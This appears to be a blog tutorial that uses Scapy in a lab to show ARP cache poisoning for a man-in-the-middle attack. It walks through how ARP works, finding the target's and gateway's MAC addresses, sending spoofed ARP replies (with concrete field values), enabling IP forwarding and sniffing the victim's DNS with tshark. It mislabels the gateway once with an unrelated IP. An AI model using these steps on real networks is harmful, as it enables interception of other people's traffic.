ARP cache poisoning is one of the most popular ways of doing a MITM attack on a local area network. This article is going to demonstrate how to build a python program to poison the ARP cache of the target and the gateway in order to perform a successful MITM attack.
In order to build the program, we need to go through the steps of ARP Cache Poisoning, and then I will demonstrate it, using Scapy. To demonstrate ARP Poisoning, I have the attacker’s machine on the VirtualBox running Kali Linux in Bridged Adapter with the Target machine running Windows. Both the machines are connected on a WLAN.
As the name of the attack suggests, we will be poisoning the ARP cache of the target. Each machine on the LAN has a local ARP table(cache) that it maintains. This table is formed by the various ARP responses that the machine receives for different ARP requests.
For example, Machine A (10.0.2.5) wants to communicate to MachineB (10.0.2.6). In order to communicate, Machine A requires the MAC address of MachineB. So, Machine A searches his ARP table(cache) if he could find the MAC address associated with the IP address 10.0.2.6. If he does, well and good he can send the packet to Machine B, else Machine A will send an ARP broadcast message. The ARP broadcast is directed to ff:ff:ff:ff:ff:ff. The request message will travel across the network to every machine asking if that machine’s IP address matches 10.0.2.6. When machine B finds the ARP request, it sends an ARP response to Machine A(10.0.2.5) telling what its MAC address is. Machine A writes this to its local ARP table.
To poison it, we will send false ARP responses, by spoofing the source IP address.
Now let's introduce Scapy.
Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.
To know how to install it, one can go to this link.
First, let's get the hang of scapy first. We can sniff, dissect and forge packets using Scapy. As this article will be talking about ARP poisoning, we will be dealing only with forging of packets.
To see what are the fields of a layer we can use the ls() function.
To create a packet we append two layers together using the “/” operator.
To send a packet we use the command send().
Pretty easy right?!!
Moving forward, let's get to ARP poisoning.
To see the ARP table in both Windows and Linux, one can use the command arp -a.
So my lab setup consists of the target machine(192.168.43.65), the attacker machine(192.168.43.220) and the Gateway(192.168.43.1). As an attacker I will be poisoning the target and the gateway, to successfully carry out the MITM sniffing attack.
! Note: Ensure packet forwarding is enabled. To enable it use the following command: echo 1 > /proc/sys/net/ipv4/ip_forward.
Step 1: Finding out the MAC address of the target and the Gateway
To find the MAC address of the target and the gateway, we will send a broadcast message for both of them.
So we design the ARP broadcast request for IP address= 192.168.43.1(gateway)
!Note: In ARP layer, hwsrc and hwdst represent MAC address of source and destination respectively, while psrc and pdst represent the IP address of source and destination respectively.
Similarly, we find out the MAC address of the target(192.168.43.65).
Step 2: Sending false ARP response packets to both the target and the gateway.
The false ARP response to the target will contain the pdst= ‘192.168.43.65’ hwdst= ‘08:25:25:5c:9d:51' and psrc= ‘192.168.43.1’. By default, this packet would have the attacker’s MAC address. Thus when the target gets the packet it updates its ARP table with rogue MAC address associated with the gateway’s IP address. To ensure that our poisoning is not cured, we will have to continuously send the ARP responses, which will be done in the python script.
As we don't need to receive a packet in response, so we will just use send().
Similarly craft a packet for the gateway ( 22.214.171.124, 84:fd:d1:14:a6:9f ) by spoofing the psrc as “192.168.43.65”.
Step 3: Once the attack is done. Remember to restore the ARP tables of the machines.
To restore the ARP tables we will have to craft the packets that originally should have been used.
This how it can be done in Scapy. But this was just to demonstrate how to use scapy. To automate the whole process, I have developed a python script. The python script will convert each step into a function.
The MITM is also working, if one does tshark -i <interface> | grep DNS , on the attacker's machine, one can see the DNS requests of the target going through.
To learn what other cool network security stuff you can do with scapy, you can visit following links: